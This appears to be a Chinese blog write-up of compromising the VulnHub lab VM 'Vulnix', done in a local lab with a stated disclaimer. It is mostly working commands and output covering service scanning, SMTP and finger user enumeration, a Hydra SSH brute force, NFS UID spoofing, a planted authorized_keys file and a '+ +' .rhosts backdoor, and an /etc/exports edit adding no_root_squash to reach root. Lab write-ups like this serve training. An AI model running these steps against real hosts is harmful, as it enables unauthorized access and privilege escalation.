前言
⏰时间:2023.7.25
🗺️靶机地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
主机发现
PS D:\> nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 15:31 中国标准时间
Nmap scan report for 192.168.58.158
Host is up (0.00s latency).
MAC Address: 00:0C:29:75:FA:A0 (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
目标是192.168.58.158
端口信息
┌──(root㉿kali)-[~]
└─# nmap -sC -A -T4 -v -p- 192.168.58.158
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after: 2022-08-31T17:40:12
| MD5: 58e3:f1ac:fef6:b6d1:744c:836f:ba24:4f0a
|_SHA-1: 712f:69ba:8c54:32e5:711c:898b:55ab:0a83:44a0:420b
79/tcp open finger Debian fingerd
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
|_user user pts/0 12 Jul 24 14:13 (192.168.58.153)\x0D
110/tcp open pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 47672/udp mountd
| 100005 1,2,3 51054/tcp6 mountd
| 100005 1,2,3 56745/udp6 mountd
| 100005 1,2,3 58830/tcp mountd
| 100021 1,3,4 51480/udp nlockmgr
| 100021 1,3,4 53518/udp6 nlockmgr
| 100021 1,3,4 56179/tcp6 nlockmgr
| 100021 1,3,4 59578/tcp nlockmgr
| 100024 1 33552/tcp status
| 100024 1 50259/udp status
| 100024 1 50837/tcp6 status
| 100024 1 58901/udp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2023-07-24T13:40:34+00:00; -13h28m33s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:35+00:00; -13h28m33s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f:3e28:c85d:e10c:7b7a:2435:c5e7:84fc
|_SHA-1: 4a49:a407:01f1:37c8:81a3:4519:981b:1eee:6856:348e
|_ssl-date: 2023-07-24T13:40:35+00:00; -13h28m33s from scanner time.
2049/tcp open nfs 2-4 (RPC #100003)
32816/tcp open mountd 1-3 (RPC #100005)
33552/tcp open status 1 (RPC #100024)
49576/tcp open mountd 1-3 (RPC #100005)
58830/tcp open mountd 1-3 (RPC #100005)
59578/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:75:FA:A0 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.022 days (since Tue Jul 25 10:37:49 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -13h28m33s, deviation: 0s, median: -13h28m33s
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.58.158
NSE: Script Post-scanning.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.59 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
SMTP
┌──(eric㉿kali)-[/]
└─$ smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.58.158 -p 25 2>&1
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Jul 25 11:35:15 2023 #########
192.168.58.158: root exists
192.168.58.158: user exists
######## Scan completed at Tue Jul 25 11:35:15 2023 #########
2 results.
17 queries in 1 seconds (17.0 queries / sec)
可以看到存在user用户
之前看到nmap探测25端口smtp存在vulnix,看是否存在用户vulnix
┌──(eric㉿kali)-[/]
└─$ smtp-user-enum -M VRFY -u vulnix -t 192.168.58.158 -p 25 2>&1
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Jul 25 11:35:48 2023 #########
192.168.58.158: vulnix exists
######## Scan completed at Tue Jul 25 11:35:48 2023 #########
1 results.
1 queries in 1 seconds (1.0 queries / sec)
finger信息枚举
set rhostsmsf6 auxiliary(scanner/finger/finger_users) > set rhosts 192.168.58.158
rhosts => 192.168.58.158
runmsf6 auxiliary(scanner/finger/finger_users) > run
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: backup
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: bin
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: daemon
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: games
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: gnats
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: irc
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: landscape
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: libuuid
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: list
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: lp
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: mail
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: dovecot
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: man
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: messagebus
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: news
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: nobody
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: postfix
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: proxy
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: root
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: sshd
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: sync
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: sys
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: syslog
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: user
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: dovenull
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: uucp
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: whoopsie
[+] 192.168.58.158:79 - 192.168.58.158:79 - Found user: www-data
[+] 192.168.58.158:79 - 192.168.58.158:79 Users found: backup, bin, daemon, dovecot, dovenull, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, proxy, root, sshd, sync, sys, syslog, user, uucp, whoopsie, www-data
[*] 192.168.58.158:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
┌──(eric㉿kali)-[/]
└─$ finger user@192.168.58.158
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
┌──(eric㉿kali)-[/]
└─$ finger vulnix@192.168.58.158
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
可以看到user和vulnix的shell是/bin/bash,是可以登录的
可以对user用户进行ssh爆破
SSH爆破
hydra -l user -P /usr/share/wordlists/rockyou.txt -e nsr ssh://192.168.58.158
[22][ssh] host: 192.168.58.158 login: user password: letmein
┌──(root㉿kali)-[~]
└─# ssh user@192.168.58.158
user@192.168.58.158's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Mon Jul 24 14:13:47 BST 2023
System load: 0.0 Processes: 90
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 6% IP address for eth0: 192.168.58.158
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
user@vulnix:~$ getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
可以确定vulnix用户uid2008
NFS挂载
┌──(eric㉿Eric)-[~]
└─$ sudo showmount -e 192.168.58.158
Export list for 192.168.58.158:
/home/vulnix * #得到挂载目录
┌──(root㉿kali)-[~]
└─# mkdir /tmp/mnt
┌──(root㉿kali)-[~]
└─# mount 192.168.58.158:/home/vulnix /tmp/mnt
┌──(root㉿kali)-[~]
└─# cd /tmp/mnt
cd: permission denied: /tmp/mnt
没权限进入,因为他检测到uid不匹配,所以我们需要进入某个用户查看用户id
我们在本地添加uid为2008的用户vulnix
┌──(root㉿kali)-[~]
└─# useradd -u 2008 vulnix
┌──(root㉿kali)-[~]
└─# su vulnix
$ cd /tmp/mnt;ls -la
total 20
drwxr-x--- 2 nobody nogroup 4096 Sep 3 2012 .
drwxr-xr-x 3 root root 4096 Jul 24 22:11 ..
-rw-r--r-- 1 nobody nogroup 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 nobody nogroup 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 nobody nogroup 675 Apr 3 2012 .profile
┌──(root㉿kali)-[~/.ssh]
└─# chsh vulnix -s /bin/bash
#shell类型改为/bin/bash这样好用点
SSH免密登陆
进入了vulnix目录,下面用kali生成的公钥复制到挂载目录的.ssh目录下,命令为authorized_keys
cp ~/.ssh/id_rsa.pub /tmp
su vulnix
mkdir /tmp/mnt/.ssh
cp /tmp/id_rsa.pub /tmp/mnt/.ssh/authorized_keys
ctrl+D #正常退出
ssh vulnix@192.168.58.158
我这里尝试了八万次没成功,不知道什么原因,按理说可以登陆的
RLOGIN登录vulnix
这里我尝试另一种方法登录,前面探测到还有一个服务login,可以通过rlogin命令远程登陆,无需密码
前提是在挂载目录下添加.rhosts文件
echo '+ +' > .rhosts
# 表示允许任何主机的任何用户登录,+这里表示通配符
ctrl+d #正常退出
rlogin 192.168.58.158 -l vulnix
挂载ROOT
进入后sudo -l
sudoedit /etc/exports
将这部分改为:
/root *(rw, no_root_squash)
保存后需要重启目标机器
重启后看到目标挂载目录变成root
┌──(root㉿kali)-[/home/eric/myfile/NfSpy-master]
└─# mount 192.168.58.158:/root /root
┌──(root㉿kali)-[/home/eric/myfile/NfSpy-master]
└─# cd /root
┌──(root㉿kali)-[~]
└─# ls -la
total 28
drwx------ 3 nobody nogroup 4096 Sep 3 2012 .
drwxr-xr-x 19 root root 4096 Jul 25 11:49 ..
-rw------- 1 nobody nogroup 0 Sep 3 2012 .bash_history
-rw-r--r-- 1 nobody nogroup 3106 Apr 19 2012 .bashrc
drwx------ 2 nobody nogroup 4096 Sep 3 2012 .cache
-rw-r--r-- 1 nobody nogroup 140 Apr 19 2012 .profile
-r-------- 1 nobody nogroup 33 Sep 3 2012 trophy.txt
-rw------- 1 nobody nogroup 710 Sep 3 2012 .viminfo
┌──(root㉿kali)-[~]
└─# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be